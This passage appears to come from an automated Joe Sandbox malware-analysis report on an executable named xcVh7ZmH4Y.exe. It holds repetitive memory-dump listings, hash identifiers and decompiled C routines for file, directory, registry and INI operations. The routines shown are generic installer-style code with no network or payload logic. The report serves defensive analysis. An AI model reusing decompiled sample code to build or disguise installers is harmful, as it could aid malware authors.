                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction ID: f98c5e72cab4da6dd47fcf147c12dc0649e5852bd482257a86ca63d172a8b8d6
                                                • Opcode Fuzzy Hash: d8feea9b0bd879c8f8267a4ec85e9a32d700cac98845316580bbb569ce856791
                                                • Instruction Fuzzy Hash: 0B01F4316202209FE7094B389D05B6A3698E710319F14823FF851F65F1EA78DC029B4C
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Window$EnableShow
                                                • String ID:
                                                • API String ID: 1136574915-0
                                                • Opcode ID: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                • Instruction ID: ff95e9915c8c9942b49c08d49a5710ecdabad47c7be9b03b7ba0a01474a23479
                                                • Opcode Fuzzy Hash: dc6c04349ba6d228002943a8c0baf5b02fcea73b120ed6c720f8467004a60d34
                                                • Instruction Fuzzy Hash: E7E04872908211CFE705EBA4EE495AD77F4EF40325710497FE501F11D1DBB55D00965D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040690A(signed int _a4) {
                                                				struct HINSTANCE__* _t5;
                                                				signed int _t10;
                                                
                                                				_t10 = _a4 << 3;
                                                				_t8 =  *(_t10 + 0x40a3e0);
                                                				_t5 = GetModuleHandleA( *(_t10 + 0x40a3e0));
                                                				if(_t5 != 0) {
                                                					L2:
                                                					return GetProcAddress(_t5,  *(_t10 + 0x40a3e4));
                                                				}
                                                				_t5 = E0040689A(_t8); // executed
                                                				if(_t5 == 0) {
                                                					return 0;
                                                				}
                                                				goto L2;
                                                			}





                                                0x00406912
                                                0x00406915
                                                0x0040691c
                                                0x00406924
                                                0x00406930
                                                0x00000000
                                                0x00406937
                                                0x00406927
                                                0x0040692e
                                                0x00000000
                                                0x0040693f
                                                0x00000000

                                                APIs
                                                • GetModuleHandleA.KERNEL32(?,00000020,?,0040363D,0000000B), ref: 0040691C
                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406937
                                                  • Part of subcall function 0040689A: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                  • Part of subcall function 0040689A: wsprintfW.USER32 ref: 004068EC
                                                  • Part of subcall function 0040689A: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406900
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                • String ID:
                                                • API String ID: 2547128583-0
                                                • Opcode ID: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction ID: 98bdf7d71c6046f852b78b75196177710d0a141037308efd39b2ac7baa162fea
                                                • Opcode Fuzzy Hash: c7c26614299f557633109f7ac2ccf4e744cd73af09153470ea8035ac80f12020
                                                • Instruction Fuzzy Hash: 9FE0867390422066D21196745D44D7773A89B99750306443EF946F2090DB38DC31A76E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 68%
                                                			E0040602D(WCHAR* _a4, long _a8, long _a12) {
                                                				signed int _t5;
                                                				void* _t6;
                                                
                                                				_t5 = GetFileAttributesW(_a4); // executed
                                                				asm("sbb ecx, ecx");
                                                				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                				return _t6;
                                                			}





                                                0x00406031
                                                0x0040603e
                                                0x00406053
                                                0x00406059

                                                APIs
                                                • GetFileAttributesW.KERNEL32(00000003,004030BD,C:\Users\user\Desktop\xcVh7ZmH4Y.exe,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                • CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040387D,?), ref: 00406053
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: File$AttributesCreate
                                                • String ID:
                                                • API String ID: 415043291-0
                                                • Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
                                                • Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
                                                • Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00406008(WCHAR* _a4) {
                                                				signed char _t3;
                                                				signed char _t7;
                                                
                                                				_t3 = GetFileAttributesW(_a4); // executed
                                                				_t7 = _t3;
                                                				if(_t7 != 0xffffffff) {
                                                					SetFileAttributesW(_a4, _t3 & 0x000000fe);
                                                				}
                                                				return _t7;
                                                			}





                                                0x0040600d
                                                0x00406013
                                                0x00406018
                                                0x00406021
                                                0x00406021
                                                0x0040602a

                                                APIs
                                                • GetFileAttributesW.KERNEL32(?,?,00405C0D,?,?,00000000,00405DE3,?,?,?,?), ref: 0040600D
                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00406021
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction ID: c979a2e86073268fb5c10017c0603d576bb262e7e1663e1e1b2ee048d1a5e24b
                                                • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                • Instruction Fuzzy Hash: 34D012725041316FC2102728EF0C89BBF55EF643717014B35F9A5A22F0CB304C638A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405AEB(WCHAR* _a4) {
                                                				int _t2;
                                                
                                                				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                				if(_t2 == 0) {
                                                					return GetLastError();
                                                				}
                                                				return 0;
                                                			}




                                                0x00405af1
                                                0x00405af9
                                                0x00000000
                                                0x00405aff
                                                0x00000000

                                                APIs
                                                • CreateDirectoryW.KERNEL32(?,00000000,00403520,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405AF1
                                                • GetLastError.KERNEL32 ref: 00405AFF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction ID: 33feed20cbbf131019f18849f7ccc9358209a8d33535326e0157453b6049084a
                                                • Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
                                                • Instruction Fuzzy Hash: 1BC04C30204501AED6105B609E48B177AA4DB50741F16843D6146E41E0DA789455EE2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004023B2(int __eax, WCHAR* __ebx) {
                                                				WCHAR* _t11;
                                                				WCHAR* _t13;
                                                				void* _t17;
                                                				int _t21;
                                                
                                                				_t11 = __ebx;
                                                				_t5 = __eax;
                                                				_t13 = 0;
                                                				if(__eax != __ebx) {
                                                					__eax = E00402DA6(__ebx);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                					_t13 = E00402DA6(0x11);
                                                				}
                                                				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                					_t11 = E00402DA6(0x22);
                                                				}
                                                				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                				_t21 = _t5;
                                                				if(_t21 == 0) {
                                                					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                				return 0;
                                                			}







                                                0x004023b2
                                                0x004023b2
                                                0x004023b4
                                                0x004023b8
                                                0x004023bb
                                                0x004023c0
                                                0x004023c5
                                                0x004023ce
                                                0x004023ce
                                                0x004023d3
                                                0x004023dc
                                                0x004023dc
                                                0x004023e9
                                                0x004015b4
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                				void* _t7;
                                                				long _t8;
                                                				void* _t9;
                                                
                                                				_t7 = E00406329(_a4,  &_a12);
                                                				if(_t7 != 0) {
                                                					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                					return _t8;
                                                				}
                                                				_t9 = 6;
                                                				return _t9;
                                                			}






                                                0x004063e2
                                                0x004063eb
                                                0x00406401
                                                0x00000000
                                                0x00406401
                                                0x004063ef
                                                0x00000000

                                                APIs
                                                • RegCreateKeyExW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060DF(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060e3
                                                0x004060f3
                                                0x004060fb
                                                0x00000000
                                                0x00406102
                                                0x00000000
                                                0x00406104

                                                APIs
                                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004060B0(void* _a4, void* _a8, long _a12) {
                                                				int _t7;
                                                				long _t11;
                                                
                                                				_t11 = _a12;
                                                				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                				if(_t7 == 0 || _t11 != _a12) {
                                                					return 0;
                                                				} else {
                                                					return 1;
                                                				}
                                                			}





                                                0x004060b4
                                                0x004060c4
                                                0x004060cc
                                                0x00000000
                                                0x004060d3
                                                0x00000000
                                                0x004060d5

                                                APIs
                                                • ReadFile.KERNEL32(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                				void* _t7;
                                                				long _t8;
                                                				void* _t9;
                                                
                                                				_t7 = E00406329(_a4,  &_a12);
                                                				if(_t7 != 0) {
                                                					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                					return _t8;
                                                				}
                                                				_t9 = 6;
                                                				return _t9;
                                                			}






                                                0x004063b4
                                                0x004063bb
                                                0x004063ce
                                                0x00000000
                                                0x004063ce
                                                0x004063bf
                                                0x00000000

                                                APIs
                                                • RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.894930412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.894903562.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894975222.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.894992891.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895018034.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895186158.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895208596.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895231205.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895244969.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895264592.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895285792.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.895305808.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xcVh7ZmH4Y.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                Uniqueness

